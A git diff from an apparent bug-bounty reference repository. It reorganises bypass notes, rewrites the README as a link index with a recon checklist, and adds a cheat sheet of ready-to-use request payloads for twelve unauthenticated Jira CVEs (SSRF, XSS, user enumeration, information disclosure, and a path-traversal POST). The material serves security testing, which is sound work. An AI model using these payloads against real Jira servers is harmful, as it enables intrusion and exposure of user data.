diff --git a/Bypass 2FA.md b/Bypass/Bypass 2FA.md
similarity index 100%
rename from Bypass 2FA.md
rename to Bypass/Bypass 2FA.md
diff --git a/Bypass 403.md b/Bypass/Bypass 403.md
similarity index 100%
rename from Bypass 403.md
rename to Bypass/Bypass 403.md
diff --git a/Bypass CSRF.md b/Bypass/Bypass CSRF.md
similarity index 100%
rename from Bypass CSRF.md
rename to Bypass/Bypass CSRF.md
diff --git a/Bypass Captcha.md b/Bypass/Bypass Captcha.md
similarity index 100%
rename from Bypass Captcha.md
rename to Bypass/Bypass Captcha.md
diff --git a/Bypass File Upload.md b/Bypass/Bypass File Upload.md
similarity index 100%
rename from Bypass File Upload.md
rename to Bypass/Bypass File Upload.md
diff --git a/Bypass Rate Limit.md b/Bypass/Bypass Rate Limit.md
similarity index 100%
rename from Bypass Rate Limit.md
rename to Bypass/Bypass Rate Limit.md
diff --git a/Misc/Recon.MD b/Misc/Recon.MD
deleted file mode 100644
index 3bbc6a8..0000000
--- a/Misc/Recon.MD
+++ /dev/null
@@ -1,66 +0,0 @@
-# Bug-Bounty-Recon
-
-## Small Scope
-### Only Specific URLs are part of Scope. This usually includes staging/dev/testing or single URLs. like: app.harshbothra.tech
-- [x] Directory Enumeration
-- [x] Technology Fingerprinting
-- [x] Port Scanning
-- [x] Parameter Fuzzing
-- [x] Wayback History
-- [x] Known Vulnerabilities
-- [x] Hardcoded Information in JavaScript
-- [x] Domain Specific GitHub & Google Dorking
-- [x] Broken Link Hijacking
-- [x] Data Breach Analysis
-- [x] Misconfigured Cloud Storage
-## Medium Scope
-### Usually the scope is wild card scope where all the subdomains are part of scope. like: Scope: *.harshbothra.tech
-- [x] Subdomain Enumeration
-- [x] Subdomain Takeover
-- [x] Probing & Technology Fingerprinting
-- [x] Port Scanning
-- [x] Known Vulnerabilities
-- [x] Template Based Scanning (Nuclei/Jeales)
-- [x] Misconfigured Cloud Storage
-- [x] Broken Link Hijacking
-- [x] Directory Enumeration
-- [x] Hardcoded Information in JavaScript
-- [x] GitHub Reconnaissance
-- [x] Google Dorking
-- [x] Data Breach Analysis
-- [x] Parameter Fuzzing
-- [x] Internet Search Engine Discovery (Shodan, Censys, Spyse, etc.)
-- [x] IP Range Enumeration (If in Scope)
-- [x] Wayback History
-- [x] Potential Pattern Extraction with GF and automating further for XSS, SSRF, etc.
-- [x] Heartbleed Scanning
-- [x] General Security Misconfiguration Scanning
-## Large Scope
-### Everything related to the Organization is a part of Scope. This includes child companies, subdomains or any labelled asset owned by organization.
-- [x] Tracking & Tracing every possible signatures of the Target Application (Often there might not be any history on Google related to a scope target, but you can still crawl it.) ​
-- [x] Subsidiary & Acquisition Enumeration (Depth – Max)​
-- [x] Reverse Lookup
-- [x] ASN & IP Space Enumeration and Service Identification​
-- [x] Subdomain Enumeration
-- [x] Subdomain Takeover
-- [x] Probing & Technology Fingerprinting
-- [x] Port Scanning
-- [x] Known Vulnerabilities
-- [x] Template Based Scanning (Nuclei/Jeales)
-- [x] Misconfigured Cloud Storage
-- [x] Broken Link Hijacking
-- [x] Directory Enumeration
-- [x] Hardcoded Information in JavaScript
-- [x] GitHub Reconnaissance
-- [x] Google Dorking
-- [x] Data Breach Analysis
-- [x] Parameter Fuzzing
-- [x] Internet Search Engine Discovery (Shodan, Censys, Spyse, etc.)
-- [x] IP Range Enumeration (If in Scope)
-- [x] Wayback History
-- [x] Potential Pattern Extraction with GF and automating further for XSS, SSRF, etc.
-- [x] Heartbleed Scanning
-- [x] General Security Misconfiguration Scanning
-- [x] And any possible Recon Vector (Network/Web) can be applied.​
-
-Source: [Link](https://www.xmind.net/m/hKKexj/)
\ No newline at end of file
diff --git a/Misc/Unauthenticated Jira CVE.md b/Misc/Unauthenticated Jira CVE.md
new file mode 100644
index 0000000..9d9034e
--- /dev/null
+++ b/Misc/Unauthenticated Jira CVE.md	
@@ -0,0 +1,62 @@
+# Unauthenticated Jira CVEs
+1. CVE-2017-9506 (SSRF)
+```
+https://<JIRA_URL>/plugins/servlet/oauth/users/icon-uri?consumerUri=<SSRF_PAYLOAD>
+```
+2. CVE-2018-20824 (XSS)
+```
+https://<JIRA_URL>/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)
+```
+3. CVE-2019-8451 (SSRF)
+```
+https://<JIRA_URL>/plugins/servlet/gadgets/makeRequest?url=https://<HOST_NAME>:1337@example.com
+```
+4. CVE-2019-8449 (User Information Disclosure)
+```
+https://<JIRA_URL>/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
+```
+5. CVE-2019-8442 (Sensitive Information Disclosure)
+```
+https://<JIRA_URL>/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
+```
+6. CVE-2019-3403 (User Enumeration)
+```
+https://<JIRA_URL>/rest/api/2/user/picker?query=<USERNAME_HERE>
+```
+7. CVE-2020-14181 (User Enumeration)
+```
+https://<JIRA_URL>/secure/ViewUserHover.jspa?username=<USERNAME>
+```
+8. CVE-2020-14178 (Project Key Enumeration)
+```
+https://<JIRA_URL>/browse.<PROJECT_KEY>
+```
+9. CVE-2020-14179 (Information Disclosure)
+```
+https://<JIRA_URL>/secure/QueryComponent!Default.jspa
+```
+10. CVE-2019-11581 (Template Injection)
+```
+<JIRA_URL>/secure/ContactAdministrators!default.jspa
+
+* Try the SSTI Payloads
+```
+
+11.   CVE-2019-3396 (Path Traversal)
+```
+POST /rest/tinymce/1/macro/preview HTTP/1.1
+Host: {{Hostname}}
+Accept: */*
+Accept-Language: en-US,en;q=0.5 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Referer: {{Hostname}}
+Content-Length: 168
+Connection: close
+
+{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}}
+
+*Try above request with the Jira target
+```
+12.   CVE-2019-3402 (XSS)
+```
+https://<JIRA_URL>/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search
+```
\ No newline at end of file
diff --git a/README.md b/README.md
index d99cc70..83cb9b1 100644
--- a/README.md
+++ b/README.md
@@ -1,2 +1,96 @@
-# AllAboutBugBounty
-All about bug websites (bypasses, payloads, and etc)
+# All about bug bounty
+
+## List
+- [Account Takeover](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Account%20Takeover.md)
+- [Cross Site Scripting (XSS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Scripting.md)
+- [Denial of Service (DoS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Denial%20Of%20Service.md)
+- [Exposed Source Code](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Denial%20Of%20Service.md)
+- [Host Header Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Host%20Header%20Injection.md)
+- [Insecure Direct Object References (IDOR)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Insecure%20Direct%20Object%20References.md)
+- [Password Reset Flaws](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Password%20Reset%20Flaws.md)
+
+## List Bypass
+- [Bypass 2FA](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%202FA.md)
+- [Bypass 403](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20403.md)
+- [Bypass CSRF](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20CSRF.md)
+- [Bypass Captcha](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20Captcha.md)
+- [Bypass File Upload](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20File%20Upload.md)
+- [Bypass Rate Limit](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20Rate%20Limit.md)
+
+## List CMS
+- [WordPress](https://github.com/daffainfo/AllAboutBugBounty/blob/master/CMS/WordPress.md)
+
+## List Framework
+- [Laravel](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Framework/Laravel.md)
+- [Zend](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Framework/Zend.MD)
+
+## Miscellaneous
+- [Jira](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Unauthenticated%20Jira%20CVE.md)
+
+## Reconnaissance
+* ### __Small Scope__
+Only Specific URLs are part of Scope. This usually includes staging/dev/testing or single URLs.
+- [x] Directory Enumeration
+- [x] Technology Fingerprinting
+- [x] Port Scanning
+- [x] Parameter Fuzzing
+- [x] Wayback History
+- [x] Known Vulnerabilities
+- [x] Hardcoded Information in JavaScript
+- [x] Domain Specific GitHub & Google Dorking
+- [x] Broken Link Hijacking
+- [x] Data Breach Analysis
+- [x] Misconfigured Cloud Storage
+* ### __Medium Scope__
+Usually the scope is wild card scope where all the subdomains are part of scope
+- [x] Subdomain Enumeration
+- [x] Subdomain Takeover
+- [x] Probing & Technology Fingerprinting
+- [x] Port Scanning
+- [x] Known Vulnerabilities
+- [x] Template Based Scanning (Nuclei/Jeales)
+- [x] Misconfigured Cloud Storage
+- [x] Broken Link Hijacking
+- [x] Directory Enumeration
+- [x] Hardcoded Information in JavaScript
+- [x] GitHub Reconnaissance
+- [x] Google Dorking
+- [x] Data Breach Analysis
+- [x] Parameter Fuzzing
+- [x] Internet Search Engine Discovery (Shodan, Censys, Spyse, etc.)
+- [x] IP Range Enumeration (If in Scope)
+- [x] Wayback History
+- [x] Potential Pattern Extraction with GF and automating further for XSS, SSRF, etc.
+- [x] Heartbleed Scanning
+- [x] General Security Misconfiguration Scanning
+* ### __Large Scope__
+Everything related to the Organization is a part of Scope. This includes child companies, subdomains or any labelled asset owned by organization.
+- [x] Tracking & Tracing every possible signatures of the Target Application (Often there might not be any history on Google related to a scope target, but you can still crawl it.) ​
+- [x] Subsidiary & Acquisition Enumeration (Depth – Max)​
+- [x] Reverse Lookup
+- [x] ASN & IP Space Enumeration and Service Identification​
+- [x] Subdomain Enumeration
+- [x] Subdomain Takeover
+- [x] Probing & Technology Fingerprinting
+- [x] Port Scanning
+- [x] Known Vulnerabilities
+- [x] Template Based Scanning (Nuclei/Jeales)
+- [x] Misconfigured Cloud Storage
+- [x] Broken Link Hijacking
+- [x] Directory Enumeration
+- [x] Hardcoded Information in JavaScript
+- [x] GitHub Reconnaissance
+- [x] Google Dorking
+- [x] Data Breach Analysis
+- [x] Parameter Fuzzing
+- [x] Internet Search Engine Discovery (Shodan, Censys, Spyse, etc.)
+- [x] IP Range Enumeration (If in Scope)
+- [x] Wayback History
+- [x] Potential Pattern Extraction with GF and automating further for XSS, SSRF, etc.
+- [x] Heartbleed Scanning
+- [x] General Security Misconfiguration Scanning
+- [x] And any possible Recon Vector (Network/Web) can be applied.​
+
+Source: [Link](https://www.xmind.net/m/hKKexj/)
+
+## Coming Soon!
\ No newline at end of file